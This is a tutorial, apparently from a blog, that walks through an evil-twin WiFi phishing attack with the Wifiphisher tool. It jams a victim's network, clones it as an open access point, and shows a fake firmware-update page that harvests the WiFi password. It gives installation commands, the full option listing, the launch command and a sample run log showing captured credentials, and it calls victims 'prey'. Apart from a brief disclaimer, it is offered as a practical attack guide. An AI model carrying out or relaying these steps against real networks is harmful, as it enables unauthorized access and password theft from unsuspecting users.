The article is intended for reference purposes, not for destructive purposes. Currently, the security technology of wifi modems has also been upgraded a lot, but users’ devices often pay less attention to updating the firmware of their modems. This makes their devices vulnerable to configuration change attacks, etc. There are many ways to attack wifi networks, one of the simplest is the technique of using Wifiphisher.
Attacker using Wifiphisher will make the target router appear problematic. The Wi-Fi network seemed to be cut off, the target could still see the network, but all connection attempts failed. Other devices cannot connect to the Wi-Fi network, not just one device, but every Wi-Fi device, loses connection to the Wi-Fi network.
Then they will see a new WiFi network with the same name as the old network (this WiFi network was created by a hacker), but does not require a password. After they try to join a protected (their own) Wi-Fi network, they will log on to the open Wi-Fi network thinking that their router has a technical problem and no password is needed. As soon as they log onto the hacker-created wifi network, a website that looks similar to their router’s manufacturer’s interface is launched and informs them that their router needs to be updated. Update important firmware. If they don’t enter their password to apply the update, the internet won’t work
After entering the Wi-Fi password, the screen will prompt the router to reboot and they will think their router has been securely firmware updated. After a few minutes of waiting, their devices reconnected to the network.
Thus in practice this simple method consists of
– Interfering with the subject’s wifi network
– Create a fake Wifi network identical to the Wifi network of the object (Evil Twin)
– Create a website notifying the subject must update their firmware and require entering a password to authenticate
– The password is sent to the hacker who still thinks his network is secure
1. Here’s how
You need two Kali Linux compatible wireless adapters that support monitor mode and packet injection.
Some types of adapters can be found on Amazon: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA.
Also you will need a computer running Kali Linux, and apt updates. If you don’t do this, you will most likely run into problems during the Wifiphisher installation.
Step 1: Install Wifiphisher
Open the computer running Kali Linux, open windows
Type apt install wifiphisher to install Wifiphisher.
install Wifiphisher. apt install wifiphisher Reading package lists... Done Building dependency tree Reading state information... Done The following packages were automatically installed and are no longer required: guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0 libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160 libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16 liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26 libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24 libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21 libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9 libradare2-3.0 libsane-extras libsane-extras-common libtbb2 libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql python-anyjson python-capstone python-couchdbkit python-http-parser python-jwt python-libemu python-pam python-restkit python-socketpool x11proto-dri2-dev x11proto-gl-dev Use 'apt autoremove' to remove them. The following additional packages will be installed: python-pbkdf2 python-pyric python-roguehostapd Suggested packages: python-pyric-doc The following NEW packages will be installed: python-pbkdf2 python-pyric python-roguehostapd wifiphisher 0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded. Need to get 4,579 kB of archives. After this operation, 10.8 MB of additional disk space will be used. Do you want to continue? [Y/n] y Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B] Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB] Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB] Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB] Fetched 4,579 kB in 10s (458 kB/s) Selecting previously unselected package python-pbkdf2. (Reading database ... 431969 files and directories currently installed.) Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ... Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ... Selecting previously unselected package python-pyric. Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ... Unpacking python-pyric (0.1.6-0kali1) ... Selecting previously unselected package python-roguehostapd. Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ... Unpacking python-roguehostapd (1.2.3-0kali2) ... Selecting previously unselected package wifiphisher. Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ... Unpacking wifiphisher (1.4+git20180525-0kali2) ... Setting up python-roguehostapd (1.2.3-0kali2) ... Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ... Setting up python-pyric (0.1.6-0kali1) ... Setting up wifiphisher (1.4+git20180525-0kali2) ... Progress: [ 95%] [#######################################################...]
You can install the GitHub repo, follow the instructions on the GitHub page, as follows:
git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install
Step 2: Get to know Wifiphisher’s Flags
You can type sudo wifiphisher at –help to see Wifiphishe commands and functions.
usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE] [-aI APINTERFACE] [-iI INTERNETINTERFACE] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] optional arguments: -h, --help show this help message and exit -i INTERFACE, --interface INTERFACE Manually choose an interface that supports both AP and monitor modes for spawning the rogue AP as well as mounting additional Wi-Fi attacks from Extensions (i.e. deauth). Example: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Manually choose an interface that supports AP mode for spawning the rogue AP. Example: -aI wlan0 -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE Choose an interface that is connected on the InternetExample: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Specify the MAC address of the AP interface -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Specify the MAC address of the extensions interface -iNM, --no-mac-randomization Do not change any MAC address -kN, --keepnetworkmanager Do not kill NetworkManager -nE, --noextensions Do not load any extensions. -nD, --nodeauth Skip the deauthentication phase. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Channels to deauth. Example: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi' -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Deauth all the BSSIDs in the WLAN with that ESSID. -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Choose the phishing scenario to run.This option will skip the scenario selection phase. Example: -p firmware_upgrade -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Capture of the WPA/WPA2 handshakes for verifying passphraseExample : -hC capture.pcap -qS, --quitonsuccess Stop the script after successfully retrieving one pair of credentials -lC, --lure10-capture Capture the BSSIDs of the APs that are discovered during AP selection phase. This option is part of Lure10 attack. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Fool the Windows Location Service of nearby Windows users to believe it is within an area that was previously captured with --lure10-capture. Part of the Lure10 attack. --logging Log activity to file -dK, --disable-karma Disables KARMA attack -lP LOGPATH, --logpath LOGPATH Determine the full path of the logfile. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Determine the full path of the file that will store any captured credentials --payload-path PAYLOAD_PATH Payload path for scenarios serving a payload -cM, --channel-monitor Monitor if target access point changes the channel. -wP, --wps-pbc Monitor if the button on a WPS-PBC Registrar is pressed. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE The WLAN interface used for associating to the WPS AccessPoint. -kB, --known-beacons Broadcast a number of beacon frames advertising popular WLANs -fH, --force-hostapd Force the usage of hostapd installed in the system -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Search for phishing pages in this location --dnsmasq-conf DNSMASQ_CONF Determine the full path of a custom dnmasq.conf file -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Determine the ESSID you want to use for the phishing page
Step 3: Plug in the Wireless Network Adapter
Plug the Wireless Network Adapter into your computer, use the Wifiphisher to start the phisher process
Step 4: Run the script
Here you can use the interpreter to run the script
With wireless USB you will need to type -i
To run the script, type the following command
sudo wifiphisher -i wlan1
After running the script you will see a page that displays information about all nearby wifi networks. You can choose which network you want to attack and press Enter.
Choose option number 2
The attack is immediately started, Wifiphisher also detects which devices are trying to connect to the networks that are not, it will create fake login versions to attract devices to connect.
After the target has been deceived, a pop-up will ask them to enter their password.
When the prey enters the password, the hacker will be notified in the Wifiphisher screen.
[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-02-04 08:10 [+] Timezone detected. Setting channel range to 1-13 [+] Selecting wfphshr-wlan0 interface for the deauthentication attack [+] Selecting wlan1 interface for creating the rogue Access Point [+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5 [!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95) [+] Sending SIGKILL to wpa_supplicant [+] Sending SIGKILL to dhclient [+] Sending SIGKILL to dhclient [+] Sending SIGKILL to NetworkManager [*] Cleared leases, started DHCP, set up iptables [+] Selecting Firmware Upgrade Page template [*] Starting the fake access point... [*] Starting HTTP/HTTPS server at ports 8080, 443 [+] Show your support! [+] Follow us: https://twitter.com/wifiphisher [+] Like us: https://www.facebook.com/Wifiphisher [+] Captured credentials: wfphshr-wpa-password=myfatpassword [!] Closing
The script closes and sends the password of the hacked Wifi network to you
And this is the screen of the prey.